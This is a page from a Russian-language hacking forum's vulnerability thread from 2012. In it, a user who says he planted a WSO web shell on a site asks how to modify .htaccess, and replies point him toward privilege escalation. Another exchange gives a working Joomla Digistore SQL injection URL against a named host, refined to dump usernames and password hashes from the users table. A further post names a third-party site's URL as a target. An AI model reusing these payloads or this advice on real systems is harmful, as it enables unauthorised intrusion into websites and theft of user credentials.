HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2018 из 2422 « Первая < 10181518191819682008 2014 2015 2016 2017 2018 2019 2020 2021 2022 202820682118 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.04.2012, 19:19
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
Цитата:
Сообщение от skagen  
skagen said:
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
 
Ответить с цитированием

  #2  
Старый 23.04.2012, 19:20
Mr.Snuffer
Guest
Сообщений: n/a
Провел на форуме:
36102

Репутация: 0
По умолчанию
Цитата:
Сообщение от skagen  
skagen said:
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
Если в папке есть права - удали файл и создай заного
 
Ответить с цитированием

  #3  
Старый 23.04.2012, 21:04
Mihailov Alx
Guest
Сообщений: n/a
Провел на форуме:
2616

Репутация: 0
По умолчанию
уязвимость (SQL inj) Joomla в компоненте Digistore

http://www.exploitsdownload.com/exploit/na/joomla-digistore-sql-injection

http://joomla15.ijoomlademo.com/index.php?option=com_digistore&amp;controller=digi storeProducts&amp;task=list&amp;cid[]=-2/**/union/**/select/**/user(),user(),user(),version(),user(),user()

Объясните пожалуйста, при помощи этой уязвимости реально слить хэши и ники из основной БД сайта?
 
Ответить с цитированием

  #4  
Старый 23.04.2012, 21:19
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
а в чем проблема?

Код:
Code:
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&amp;controller=digistor%20eProducts&amp;task=list&amp;cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
 
Ответить с цитированием

  #5  
Старый 23.04.2012, 21:30
Mihailov Alx
Guest
Сообщений: n/a
Провел на форуме:
2616

Репутация: 0
По умолчанию
Цитата:
Сообщение от Seravin  
Seravin said:
а в чем проблема?
Код:
Code:
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&amp;controller=digistor%20eProducts&amp;task=list&amp;cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
Я бы был невероятно признателен Вам, если бы разъяснили в чём соль. Просто в прошлый раз когда я получал пароли на локалхосте (самописный двиг с детской уязвимостью), все хэши выпадали в ошибку, а тут даже в исходном коде нет намёков. Извините если напрягаю
 
Ответить с цитированием

  #6  
Старый 23.04.2012, 21:44
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
как минимум то, что у тебя 6 полей было, а у меня 4
 
Ответить с цитированием

  #7  
Старый 23.04.2012, 21:49
skagen
Участник форума
Регистрация: 08.01.2010
Сообщений: 155
Провел на форуме:
1008872

Репутация: 22
Отправить сообщение для skagen с помощью ICQ
По умолчанию
Цитата:
Сообщение от Га-Ноцри  
Га-Ноцри said:
Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
и каким образом сменить владельца то или повысить свои права?
 
Ответить с цитированием

  #8  
Старый 23.04.2012, 22:38
Mihailov Alx
Guest
Сообщений: n/a
Провел на форуме:
2616

Репутация: 0
По умолчанию
Цитата:
Сообщение от Seravin  
Seravin said:
как минимум то, что у тебя 6 полей было, а у меня 4
ну а дела то в конечном итоге не меняет
 
Ответить с цитированием

  #9  
Старый 23.04.2012, 23:57
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от None  
ну а дела то в конечном итоге не меняет
как это так «дела не меняет?».
 
Ответить с цитированием

  #10  
Старый 24.04.2012, 10:45
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию
No checkbone?

Код:
Code:
http://www.wollatonpirates.co.uk/index.php?option=com_joomleague&func=showNextMatch&p=1
 
Ответить с цитированием
Ответ
Страница 2018 из 2422 « Первая < 10181518191819682008 2014 2015 2016 2017 2018 2019 2020 2021 2022 202820682118 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ